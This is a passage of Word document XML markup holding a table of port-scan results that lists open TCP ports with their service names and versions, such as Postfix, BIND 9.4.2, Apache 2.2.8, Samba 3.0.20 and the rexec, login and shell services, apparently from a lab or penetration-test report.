              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41268260" w14:textId="6CB15912" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="21670B77" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1105E959" w14:textId="6E1BA420" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2AD5ACB6" w14:textId="62CFC33E" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="624F907E" w14:textId="489D862F" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="47FF4623" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="092F97F8" w14:textId="4F57C0F8" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>25/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01E5C05E" w14:textId="6271A36E" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="66117D42" w14:textId="39777D35" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Postfix smtpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="3204ECD1" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2732928B" w14:textId="58C82275" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>53/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A2CB290" w14:textId="273672B0" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7FCB36DE" w14:textId="59E81192" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ISC BIND 9.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="176733BF" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01FDE5AC" w14:textId="0F5F90D5" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="04609F80" w14:textId="4433A542" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="09D3A4D5" w14:textId="1859241E" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Apache httpd 2.2.8 ((Ubuntu) DAV/2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="0E69BB3D" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D38EFB1" w14:textId="60C2B9E7" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>111/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C505349" w14:textId="6084506D" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7097E644" w14:textId="4D3C30F3" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2 (RPC #100000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="4347E96E"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0940C272" w14:textId="5D1FCCE8" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>139/tcp</w:t>
            </w:r>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14703422" w14:textId="601D4D84" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>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2F8CAFFA" w14:textId="1ECBB8B5" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="00607DC0" w14:paraId="159C9B2D"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7856331B" w14:textId="590A2214" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>445/tcp</w:t>
            </w:r>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1DF3829B" w14:textId="0FA6A43D" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>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21E62816" w14:textId="1B675A08" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="00607DC0" w14:paraId="7EB2D8E5"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79DD71B6" w14:textId="0ECC2EA6" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>512/tcp</w:t>
            </w:r>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3F603B7E" w14:textId="155545D1" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>exec</w:t>
            </w:r>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69D72BA9" w14:textId="62EBC039" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>netkit-rsh rexecd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="00607DC0" w14:paraId="7B60DD3C" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="146DC6F0" w14:textId="3088E52F" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>513/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="527593F1" w14:textId="4798826E" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>login?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03B96B95" w14:textId="77777777" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="00607DC0" w14:paraId="709AD08A" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61FB28D4" w14:textId="0C7F7EB6" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>514/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B5A358A" w14:textId="337A36F7" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="009C4819" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C4819">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4EC4D7E2" w14:textId="77777777" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="00607DC0" w14:paraId="79DFC48E" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0F02EDC9" w14:textId="38E7FDF8" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
